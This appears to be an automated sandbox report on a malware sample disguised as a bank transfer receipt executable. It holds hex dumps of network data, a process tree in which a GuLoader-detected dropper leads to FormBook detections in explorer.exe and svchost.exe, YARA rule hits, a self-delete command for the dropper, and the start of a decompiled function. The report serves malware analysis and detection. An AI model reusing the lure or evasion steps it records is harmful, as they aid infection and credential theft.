fd 0b 2e 67 32 d8 bb dc 97 b7 95 32 40 33 d0 4b 6b c9 5c 12
                Data Ascii: n1j[4`gBwY*i<rQXA;S|@JoGw6+H]#1M|>cm*:i3V@Um1KP]H:Gd8;(;y[>72bMwp7[1rGw1XjoNuR&fkP=@t.g22@3Kk\
                2021-12-15 13:13:49 UTC147INData Raw: fa 6f c4 b2 9b 5d ad 5c 1a 77 09 02 1e b4 89 a5 0a dd 09 0f 37 6c e6 81 d6 e0 fc 17 fb 37 90 35 94 65 29 c8 98 03 b3 e2 7d b4 ab 68 1e a5 3e 88 6e 09 79 2f e2 fa 09 f4 77 4b 52 f8 13 dc d6 cc 31 56 a7 0b f3 48 56 00 66 9c 6a 16 2d 28 b8 61 74 0f e4 5b 9b 14 8b 64 40 d4 4b 67 46 c6 0a 89 f5 a0 cd 3d 76 db 89 27 40 e1 f9 b4 bd 33 f5 57 80 b3 ca d8 7d 4e 3a e0 6a 19 ae 74 22 c3 da b1 91 01 66 64 b8 8e c3 4e 76 da 5e 2d 36 78 e1 6a b4 4c ae b2 bc f4 d1 7e da dc 44 b1 6e e2 e6 2a 30 b8 c9 45 07 d3 a0 71 9b 2f 5f 40 0b d4 0d 93 d3 9d 46 89 f4 61 a8 a8 db f8 fe 1c ac 9c 36 50 4e 60 f9 0b bc ad 63 b2 b7 80 72 b8 22 f0 7a ae 6f ec 5e ed b9 8e 3d f7 8d 4d 39 72 d3 73 9a 6b 0e 2f 55 66 5e 05 75 8f 6b a3 c6 13 20 a7 7c de d3 d9 a8 30 af 6d 88 53 01 fa 94 3c 68 04 99
                Data Ascii: o]\w7l75e)}h>ny/wKR1VHVfj-(at[d@KgF=v'@3W}N:jt"fdNv^-6xjL~Dn*0Eq/_@Fa6PN`cr"zo^=M9rsk/Uf^uk |0mS<h
                2021-12-15 13:13:49 UTC149INData Raw: 33 92 b4 61 17 38 3f 4f 9c 6f e7 66 1d 8b d0 bf 2d 1c dd ec bc fe 6a 54 4e 12 d8 2e dd c8 5f 4b 63 b3 ec f9 6c a7 b4 0d f5 9d 89 f6 25 70 33 f8 66 3f 7f 62 31 65 5a 2f e9 54 6e 80 fe 90 90 83 1d da dc 61 76 f8 88 3d 7c f3 fb 3c 02 87 d1 58 0f 45 32 24 c4 66 96 23 f0 92 35 61 6c 74 02 1f 2a 74 2f 3e 01 d8 e0 13 d7 0d b1 ce 42 50 ca ea c7 30 0e e8 1d ca 05 f2 58 92 54 15 f3 be 43 7c 7c 51 81 f9 7e 60 bf 78 60 29 31 14 7c 22 65 49 c2 9d 5d bf c2 db bf 08 ac fb e2 2d 8e e4 0b be fa 8e 50 b9 4d 0f c4 ab 7b c1 d3 b8 51 f1 a1 e4 08 66 f2 9d 83 a8 e5 2f 0d 78 fb 2b a2 3f 6d 2b c7 30 55 89 3e 4c bf 55 71 24 e7 fa 41 28 aa 6a da f8 ef e8 cb 46 0b 3a 1a 61 cd d7 09 af 9f 37 f6 27 11 1c b2 a4 3a c6 47 1c aa b7 90 0c ac f5 7f 02 86 8e c9 88 d8 dd 77 f4 11 1b 1f c7 2a
                Data Ascii: 3a8?Oof-jTN._Kcl%p3f?b1eZ/Tnav=|<XE2$f#5alt*t/>BP0XTC||Q~`x`)1|"eI]-PM{Qf/x+?m+0U>LUq$A(jF:a7':Gw*
                2021-12-15 13:13:49 UTC150INData Raw: 3b 51 1d 4f 74 ff a0 ec 90 91 ad 8c 0c a0 c6 e9 d5 c9 31 50 65 0e 97 13 79 fe d8 98 46 48 19 94 cc d6 d4 af a6 43 2b 6d 9b 5f 74 f8 6f 89 05 d6 6a 7e e8 33 3a e8 2a aa 4a c7 1e cd 04 33 ad 90 2c 86 fc 85 36 f8 0e 77 f2 93 8a 8d a3 25 ef 33 e8 aa d4 c2 7e c8 62 7c cb 0c 6f aa e8 e7 50 14 18 77 3c 4c f4 5c f8 c2 00 8b 0b c2 81 67 7e c7 86 ee b1 f8 ed 35 f6 5e c3 18 77 ce a2 dc 7d 46 fc 34 1f 9f 6f aa 74 0d 3c 6c 25 5f 25 51 3d 93 3f 9d 0d e9 2c b5 00 75 65 e3 bb 37 1d 38 01 45 9f 85 cc de 37 62 c9 2b b0 05 78 77 18 26 d7 00 32 bf a7 68 2a 1a f1 8b 21 b3 31 b3 31 c0 71 1b 89 3c b9 a8 7a e4 11 4f 83 cc cf 16 e5 a2 31 60 a1 21 ca d5 51 43 c4 87 05 10 f9 ef 2e a7 95 10 4c 12 c4 53 cc 08 51 ab 1f 39 19 b5 1e b2 a5 83 99 08 30 e0 56 fe 4f 76 82 34 4f 7e 21 f8 24
                Data Ascii: ;QOt1PeyFHC+m_toj~3:*J3,6w%3~b|oPw<L\g~5^w}F4ot<l%_%Q=?,ue78E7b+xw&2h*!11q<zO1`!QC.LSQ90VOv4O~!$
                2021-12-15 13:13:49 UTC151INData Raw: 8b 68 11 7a e2 7f 2a 59 91 97 38 83 b1 9c 27 46 26 ba e2 aa b1 52 7e 4f 28 35 29 cb 1c fc a5 a1 c3 02 65 08 f6 a0 b9 cc bd 7c 7b 57 f4 31 90 20 d3 8b 06 bd 47 51 2b c5 b0 42 a2 b3 e7 07 a0 c9 95 ab 09 e1 ea 83 75 8f d3 bf 2f 0e ac b1 bb d1 f5 6b d9 03 79 90 fb 26 77 99 a8 95 b1 3d ef cc 04 a5 be d8 f4 ac 0b 19 e4 e1 d4 4c 1d 34 07 27 49 05 13 ab 2a 16 5b ea 01 c8 ad a2 66 3f a1 a3 33 95 ff 06 da 9d 6b 94 de 0c 6f 1b 53 80 f2 c3 10 53 e3 f0 af 58 67 07 44 87 7a 77 3a c2 35 7d 34 c4 a3 68 68 bf fb 14 32 99 91 10 eb f9 6f 83 ab c6 cf 98 7c 91 54 b8 49 fb 86 9c 2c ff 2a c2 f7 75 39 99 3b 31 c6 fb 17 b4 a9 36 eb 71 17 91 9d 82 1b ff d1 1b d2 1b c5 f4 89 00 c6 b9 3a 6f fc 98 a8 07 22 6d fc 29 19 cf 09 69 df ed 5c aa 00 5f fd 14 2e 96 67 36 16 cf 3d 15 76 ec b2
                Data Ascii: hz*Y8'F&R~O(5)e|{W1 GQ+Bu/ky&w=L4'I*[f?3koSSXgDzw:5}4hh2o|TI,*u9;16q:o"m)i\_.g6=v
                2021-12-15 13:13:49 UTC152INData Raw: 51 8c a9 92 77 17 a6 bb 22 1c 8e 71 ff 31 91 09 f7 28 50 9d d7 12 47 d2 06 0b cb 96 80 00 df 90 42 cf 91 d3 7f e0 07 3b f7 26 09 4d cc 12 1a df e0 0b f4 89 33 c2 b1 18 f6 90 9c 51 96 8b bd 52 17 67 fc 77 62 8e 99 56 a7 8c ec 78 53 07 57 06 12 8b de 35 52 86 54 12 cd ab 1a ef c1 67 72 3b f2 01 41 da 7f fe ed 33 d0 6b 38 25 c4 6a 9d 82 cd 6e c8 ac f0 3c 21 5b 18 40 33 94 1c 6d e6 21 ea f6 e3 b4 8a 8c 42 2d af 9c f1 83 8f 24 af 76 24 f7 9d 57 87 07 81 fa ee 21 95 94 7f e2 cf 97 5a 50 ac 3d b2 3c 03 24 2e 95 f5 a2 38 9c fe 8f 13 3a 2e 44 4d e7 6c 0c e3 51 dc 64 dc 8b 52 39 36 f3 40 ec 8e f3 ee 0b 75 e9 c6 ae 1b 04 e8 01 29 8e c8 2c e1 f3 4a b4 55 5c 00 a4 e8 ce 8e 43 47 49 05 58 d9 1b c3 a3 60 0d ad b0 9b 74 84 e8 52 f4 52 db fa 31 59 58 a3 13 f4 ce 6a a7 25
                Data Ascii: Qw"q1(PGB;&M3QRgwbVxSW5RTgr;A3k8%jn<![@3m!B-$v$W!ZP=<$.8:.DMlQdR96@u),JU\CGIX`tRR1YXj%
                2021-12-15 13:13:49 UTC154INData Raw: 32 59 ed ba 37 fd d7 ac 1b ee 40 28 6a 09 a7 5d 8b 80 76 ff 66 cb a2 3f 71 86 39 c4 a3 e0 83 f3 2e ab 84 34 8a 93 8a f7 62 53 4e 4a 25 d9 96 30 03 d4 a4 1a d8 97 69 5c 24 ca 56 b0 1e b6 92 75 47 80 93 d6 c6 20 a8 e7 b1 b4 1a 3f ec 5c 49 ce 99 a7 02 54 77 83 a1 81 34 bc a7 90 b1 c9 1a 9a 14 ee f9 b1 b5 ac bf 58 ba cf b2 d9 8f c0 ca 8f bb 87 8f 5e 59 8f 2b df d1 0f a0 32 8d 25 04 fb 2b 36 b9 6a 1d 4f 21 c1 68 78 25 cf 92 d6 0a 6c ff 8f ac b9 e5 47 64 48 7a 4e 2d c7 52 cc 11 07 9c a6 cc 56 eb 5b ba bf 53 5f 36 c6 0e b1 78 1b 58 05 d3 00 be 5f 8a 92 75 5e 26 d9 2a c5 ce 91 94 76 c0 25 97 41 cd b7 06 d7 ce 5b 64 20 dc a1 33 20 ad 2d a6 95 7e ca 89 6c 14 5e 84 14 82 e4 f6 44 bf ae 9e 64 f3 ee 9a 58 d1 89 2d c3 ab d1 f1 51 28 80 cb 87 f2 41 af e6 5d c5 cd d3 9e
                Data Ascii: 2Y7@(j]vf?q9.4bSNJ%0i\$VuG ?\ITw4X^Y+2%+6jO!hx%lGdHzN-RV[S_6xX_u^&*v%A[d 3 -~l^DdX-Q(A]
                2021-12-15 13:13:49 UTC155INData Raw: 24 c0 a4 12 f4 fa 8c 6e 3c 9a 14 83 36 67 6b 4a 23 41 ab 25 2e bc a7 6f 39 1b ac d6 70 1f b9 35 04 1f db 3d 7b a4 a2 e3 81 cd 8f a1 89 b2 74 e0 9c b4 b6 3e 28 96 8e af c6 01 77 9c 31 f7 07 1b 60 d4 1c d8 d7 a2 56 2c c4 b8 b0 41 46 dd b3 71 9e c7 1d 5d 17 26 0d 69 c3 1c 73 57 c1 a3 fe 1e 05 1e fe 52 fc 94 53 b5 ce c1 84 b4 54 1d 01 20 be 09 74 ef de 19 c5 b2 a3 e7 fb 9a c8 be 65 dd f9 80 04 29 21 10 09 be 0f dc 15 85 21 cf e9 27 91 16 5a 9e 36 89 a4 6f 77 dd dc 9e 32 7d 9b 08 26 51 af 35 77 17 11 d8 22 40 80 7e e3 a3 a1 1a 7b 16 c2 37 5e 1c 61 b2 8c 2e b1 27 d6 37 10 1c da 2b 17 af 0c 7e 5f 0b 40 e4 5f 0f 6e 17 56 36 0a 4c 5b d0 fb ab 45 58 f5 1a 48 7c 92 80 d1 2a 09 c8 03 f8 3b bd 16 f7 5e 9b 93 56 6f d2 ad f0 e3 e3 72 f0 24 8c 47 30 a2 49 e8 e6 80 95 15
                Data Ascii: $n<6gkJ#A%.o9p5={t>(w1`V,AFq]&isWRST te)!!'Z6ow2}&Q5w"@~{7^a.'7+~_@_nV6L[EXH|*;^Vor$G0I
                2021-12-15 13:13:49 UTC156INData Raw: 63 c4 98 ca 6f 96 be c5 ce c9 96 48 07 94 bd a0 78 3e bb 50 a6 5f d5 f8 01 41 43 80 ea ed a3 86 dc d4 6f c3 d2 4b 89 80 75 54 ef af 81 6e dc bb 0b 7e a3 bf e2 ce 3d ff 8f 1a 3f 96 65 ed 0b 44 1f 1d cb 42 5b 73 4e 1d a9 6b 40 9e 69 c5 e0 a7 5c 86 8c 93 dd 14 5c a2 c7 3f ed 2c 60 54 a2 79 ba 44 1d ff 66 9c ce 46 a8 64 3c 2b 34 3e 12 1c 5e 91 06 41 34 78 05 ae e0 89 dd a8 29 76 1b b0 71 7e 7a 66 fb 7a d9 c1 db e4 9d eb 5c 45 26 b6 98 5a f6 5f 65 ae 85 7c 01 ed a7 af 0c 5c c9 cc a7 16 43 f1 a8 85 69 ac c9 38 c5 f6 cc c3 f6 a6 77 89 39 37 50 71 65 55 d5 ea da 5a 01 5d 87 51 fb 26 11 d1 4b 7b fe e0 1c 6b 77 ff 37 c5 16 cf 8b f0 b3 21 32 29 bd 6a 8a 3d 4d fb 02 b8 93 9e 12 15 ac 03 40 27 d3 d1 70 d5 f2 4f 36 f0 54 11 c0 8b 1c 60 b2 ef 1f d5 15 03 dc e8 cc da 89
                Data Ascii: coHx>P_ACoKuTn~=?eDB[sNk@i\\?,`TyDfFd<+4>^A4x)vq~zfz\E&Z_e|\Ci8w97PqeUZ]Q&K{kw7!2)j=M@'pO6T`
                2021-12-15 13:13:49 UTC157INData Raw: 7e b0 2b fa 16 d3 8f 0b f9 62 05 72 18 13 cd aa dd 07 4e 11 09 dc d4 f9 5b e2 40 17 72 de 5a 5b 33 65 b1 85 0f 5e e2 d1 56 dc 89 c3 5c 8a 1b 75 9d e3 5e fc 73 15 f3 53 f5 78 07 bc f6 a6 9c 5a 05 24 0f a3 37 1c 33 fc e8 e6 b7 9c 4b fe 7a da 91 6d 32 a1 e1 f6 6e 00 81 90 84 1b 69 bc 79 9a 99 56 21 bf 40 77 7c 2d 22 b8 e8 0b 13 c7 6a b0 52 cc e5 1a 7c cb 63 57 f7 19 23 5e f3 0f 0d 13 af a7 5f 69 94 68 db 35 04 6d b5 c0 8d b1 f1 b2 3c 20 8c 57 55 89 80 10 15 61 e0 cb 9b 7e d0 58 e3 63 d9 32 0f 71 bf 5c 9e 23 49 2c 92 c7 39 68 e1 a0 d7 7d 22 b0 cf 92 ad 9c 86 7b 1d 6e f9 0a 8b 12 1f ae 1c 76 02 8f 49 c0 a8 cd c7 1b 87 d2 be 67 2a ce fe ba b7 d6 13 70 83 8a 5a 6a fb b9 e7 ca f2 c1 9b c9 25 c3 3e c0 9e ed b1 41 e5 6d 5d c6 60 a3 44 d6 54 f5 52 b7 26 d6 2a e1 de
                Data Ascii: ~+brN[@rZ[3e^V\u^sSxZ$73Kzm2niyV!@w|-"jR|cW#^_ih5m< WUa~Xc2q\#I,9h}"{nvIg*pZj%>Am]`DTR&*
                2021-12-15 13:13:49 UTC159INData Raw: 8f 4c 33 8c c3 fe 14 da 68 6f d5 96 94 de 83 2d 95 95 9c 0f e6 cb 92 f0 0c b4 16 c5 31 ad c5 5d d7 7e 7c ee 44 19 55 3d 91 22 4c 54 eb b5 70 08 5b e0 e8 11 7b 11 70 03 61 c3 04 63 96 ee 10 8a d5 55 3b 71 52 46 da b4 29 38 7f 77 1d fa 6f a3 f3 9d 15 0a 5e ba 74 3b 0a 49 d7 08 75 75 a6 ec 8f 40 b2 2f 6f d0 21 48 96 04 b2 ac d8 e4 97 b9 2d 20 21 7d ee 14 b8 a8 f2 9f 34 6f 0f 35 1c 65 f8 fd c1 30 ae f1 0e 89 5c e5 9d 61 47 df d9 62 7d a5 94 75 73 5b b9 79 2b 4d 35 0d 8d b4 28 d8 9a de df c7 df 3a 66 83 3c 70 82 c3 36 78 46 36 3d 12 ac ef 68 e0 cc 8f 06 45 39 64 0e b2 26 bf b3 2a fb 4c 7b 88 a1 7d b4 a4 f4 8c ca 94 17 f2 ea 65 c8 e1 9b 9c 2e f6 39 5a 51 0b 74 0c 38 ea 2a 8a 5b 8f 43 45 44 a9 92 e5 5b f9 bf ee 41 c5 1f 86 db 3d 5b 01 4f 68 29 a1 4e ae cb 3a 62
                Data Ascii: L3ho-1]~|DU="LTp[{pacU;qRF)8wo^t;Iuu@/o!H- !}4o5e0\aGb}us[y+M5(:f<p6xF6=hE9d&*L{}e.9ZQt8*[CED[A=[Oh)N:b
                2021-12-15 13:13:49 UTC160INData Raw: ee 4a dc db 81 31 83 85 a2 ad 29 8d 5e e2 4a 6c 7f dd a2 59 c1 bf de c3 37 07 16 c1 8c 40 50 f6 9f 83 9b db c8 aa 6c e4 5b db d3 49 68 61 1e df 37 de 47 8f 66 1c 7f 99 54 7d ec c4 62 36 5d 6d 2b e4 ce f1 ab 4f 42 07 71 2a f6 e0 6b 46 37 aa 94 86 d4 d1 ad b9 3a d5 7b b5 60 92 a9 4d fa d0 c5 20 dc 48 62 79 ca 6a db 39 63 f2 38 4c 09 98 46 76 5c 69 9a 15 1d 7d 4f 88 1c 37 9e d3 d4 e6 d2 60 aa d8 a7 f2 8d ed 9e f5 07 c4 52 b5 8f a9 11 1f 7d c6 f8 80 0f 6e d3 1b 8e 57 17 db fd 16 c1 a2 c1 5b 71 65 90 7e ac 89 a2 50 ec ff 31 0e 2a d7 fd b9 8d 05 b7 48 a5 36 9b 13 f0 5a 0c 14 c6 3f 34 06 dd d0 f9 af 4e 4b cf 93 b3 f6 0b 08 85 e3 1f fe 54 db 88 b1 0f 67 78 9d 07 73 8a ed 71 e6 37 2e dd d6 06 07 8e 14 eb 17 5a 86 64 15 8e ca c1 12 75 d1 bc f3 8a 97 56 08 5d 15 33
                Data Ascii: J1)^JlY7@Pl[Iha7GfT}b6]m+OBq*kF7:{`M Hbyj9c8LFv\i}O7`R}nW[qe~P1*H6Z?4NKTgxsq7.ZduV]3
                2021-12-15 13:13:49 UTC161INData Raw: 49 46 7e 50 10 e6 7d d5 b6 52 a1 21 67 95 71 1c 93 38 e0 4f 86 6b 5d 16 bf 4d c0 fd 5f 51 d6 b0 ff ac ec de 48 48 43 0a 8a b0 2e ed e2 e0 db 03 9d c3 2e 75 b4 0e d5 a8 e6 39 9c 27 2c 3d f1 0f 64 b8 ae 1f 2b e9 02 6f f7 09 25 80 3e 45 38 f7 96 82 2b 24 f1 9f 65 8f 32 6d e6 ff e9 21 72 91 36 56 d4 de 5e 9e 16 4d 88 9e 5f 8b 16 66 a4 fc e6 80 e1 90 b9 0f b6 97 95 8d cb 99 f0 48 77 8b cd b6 8f 0b 40 17 0b fb c0 d7 44 8b f9 4d cc de 00 cb a7 9f 64 5d bf 35 57 13 65 a9 72 e4 f3 83 a1 fa e4 cc 4d 65 0c df 4c c9 0c 18 84 6a 3b e7 09 03 d9 67 e0 13 af a1 74 46 10 9e 50 38 01 c0 ba 90 46 11 da 6b 8d a8 3b bb a9 48 52 34 86 2a 9f 93 65 39 fc e1 45 25 57 73 ec 46 da 64 0c cc fe 6a d9 53 42 50 ab d9 84 48 95 be 77 6e ed d7 4a fe cd e5 4d 34 e8 ad 44 1d f5 05 cd 09 d4
                Data Ascii: IF~P}R!gq8Ok]M_QHHC..u9',=d+o%>E8+$e2m!r6V^M_fHw@DMd]5WerMeLj;gtFP8Fk;HR4*e9E%WsFdjSBPHwnJM4D
                2021-12-15 13:13:49 UTC162INData Raw: 96 b8 cc 73 6f 8a 89 a1 4b df b5 c3 38 c6 7c f6 dc 41 fe 41 8c 34 a6 a5 17 89 e7 d7 a4 2b ec 73 6f 6b 37 9a a7 b6 0c aa 96 a1 6f 1e 08 d5 10 aa d1 f1 b6 18 dc ee 99 a6 c7 9d aa a9 9b 2e 67 f6 92 41 81 0a 09 b1 37 77 3b b7 10 13 bf 6e a6 14 5c 91 01 df 6f 61 18 ba 20 90 d4 d1 9e ed a3 ea 77 dc fe 6d f7 4b 61 c3 17 ae 39 ba 9b 94 47 f7 f0 20 4b 06 9a bf e1 f7 22 ef ff f9 b0 60 c1 fc 25 c2 47 f8 32 de 6c fb 5f c2 68 1a fd 0d 87 b5 67 df 00 be be 7e c5 ce 61 cd 80 62 c9 39 0b 7a 89 28 51 74 24 71 06 bd ed e9 18 16 d5 02 41 8b 05 b4 d9 ca 6b 5c 33 d3 42 b1 6f ce 69 c7 11 ec 0c f8 00 f9 9f 61 d5 f5 3e d4 e7 81 d3 e2 7e cb 7e bd c8 aa cc 5e 86 60 d4 e1 82 00 98 b1 9f 98 9c 3e 77 da c7 dc 72 cd c7 a0 ce 3d 15 c0 72 48 0e 43 e5 52 09 1b 4c c2 f1 65 e2 a1 69 35 d5
                Data Ascii: soK8|AA4+sok7o.gA7w;n\oa wmKa9G K"`%G2l_hg~ab9z(Qt$qAk\3Boia>~~^`>wr=rHCRLei5
                2021-12-15 13:13:49 UTC163INData Raw: f0 ed 90 31 c4 d0 00 a2 c6 d0 d1 e9 f1 6f a3 a2 b7 71 41 28 7c 69 49 82 ef 30 db 10 43 d7 5f 48 1f 4f 80 b1 7f 23 bf dd 3b 28 b9 29 1e 7d 80 7e fb ea 96 9e b8 b0 a2 ee 81 de 4c 36 c2 ac 28 45 aa 7d 32 a4 77 ff 9a bc 1f c7 de 71 b0 84 d1 90 b8 1f ea c8 e8 5e 54 ef e0 02 dc 48 42 48 22 7f db 88 95 18 37 36 b8 96 21 5b 18 55 01 1e 97 c9 72 b5 9c c2 6d b6 65 82 ce d2 a6 20 b8 44 fe b0 de 2d e5 55 28 53 2e 06 99 ee fc 81 6c 4a de 3a 4a 81 d6 85 d2 72 f7 94 ce 84 10 eb 7b 7b 03 db 48 c7 b6 85 db 79 7b bb 5d 27 54 65 49 05 ae 85 25 9d 4c f4 ea 9a 63 08 c0 33 b7 42 4a ee 85 63 e6 a2 84 f4 43 15 12 e9 05 44 73 09 08 6a 1d 9f 80 d8 97 19 d1 65 c5 8b 79 52 b6 ef 6d f7 88 09 61 2a c4 fc 2c 54 64 63 4a 97 46 4d a1 03 6d 6b de 8d d2 8d 24 0c a8 11 c4 8b 12 bf 1e 82 98
                Data Ascii: 1oqA(|iI0C_HO#;()}~L6(E}2wq^THBH"76![Urme D-U(S.lJ:Jr{{Hy{]'TeI%Lc3BJcCDsjeyRma*,TdcJFMmk$


                Code Manipulations

                Statistics

                CPU Usage

                Memory Usage

                High Level Behavior Distribution

                Behavior

                System Behavior

                General

                Start time:14:10:29
                Start date:15/12/2021
                Path:C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe"
                Imagebase:0xf30000
                File size:209920 bytes
                MD5 hash:72A345C95142AEE60E7DF54B570C2C6B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low

                General

                Start time:14:10:30
                Start date:15/12/2021
                Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe
                Wow64 process (32bit):true
                Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe
                Imagebase:0x400000
                File size:102400 bytes
                MD5 hash:BEB33BD2BF3282F8C86081144236545D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:Visual Basic
                Yara matches:
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.507414765.000000000067A000.00000040.00020000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 100%, Joe Sandbox ML
                Reputation:low

                General

                Start time:14:10:40
                Start date:15/12/2021
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                Imagebase:0x7ff734500000
                File size:69632 bytes
                MD5 hash:73C519F050C20580F8A62C849D49215A
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:14:12:08
                Start date:15/12/2021
                Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe
                Wow64 process (32bit):true
                Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe
                Imagebase:0x400000
                File size:102400 bytes
                MD5 hash:BEB33BD2BF3282F8C86081144236545D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:Visual Basic
                Yara matches:
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:low

                General

                Start time:14:13:52
                Start date:15/12/2021
                Path:C:\Windows\explorer.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\Explorer.EXE
                Imagebase:0x7ff720ea0000
                File size:3933184 bytes
                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:high

                General

                Start time:14:14:16
                Start date:15/12/2021
                Path:C:\Windows\SysWOW64\svchost.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\svchost.exe
                Imagebase:0x7ff70d6e0000
                File size:44520 bytes
                MD5 hash:FA6C268A5B5BDA067A901764D203D433
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000016.00000002.821885746.0000000003F37000.00000004.00020000.sdmp, Author: Florian Roth
                Reputation:high

                General

                Start time:14:14:21
                Start date:15/12/2021
                Path:C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit):true
                Commandline:/c del "C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe"
                Imagebase:0xd80000
                File size:232960 bytes
                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:14:14:22
                Start date:15/12/2021
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7f20f0000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high

                Disassembly

                Code Analysis


                  Executed Functions

                  C-Code - Quality: 82%
                  			E00F31910(long __ecx, CHAR** _a4, int* _a8) {
                  				signed int _v8;
                  				char _v268;
                  				char _v527;
                  				char _v528;
                  				char _v1552;
                  				CHAR* _v1556;
                  				CHAR** _v1560;
                  				int* _v1564;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t48;
                  				CHAR* _t53;
                  				CHAR* _t54;
                  				char* _t57;
                  				char* _t58;
                  				CHAR* _t60;
                  				void* _t62;
                  				signed char _t65;
                  				intOrPtr _t76;
                  				intOrPtr _t77;
                  				unsigned int _t85;
                  				CHAR* _t90;
                  				CHAR* _t92;
                  				char _t105;
                  				char _t106;
                  				CHAR** _t111;
                  				CHAR* _t115;
                  				intOrPtr* _t123;
                  				void* _t124;
                  				CHAR* _t130;
                  				CHAR* _t133;
                  				void* _t136;
                  				void* _t137;
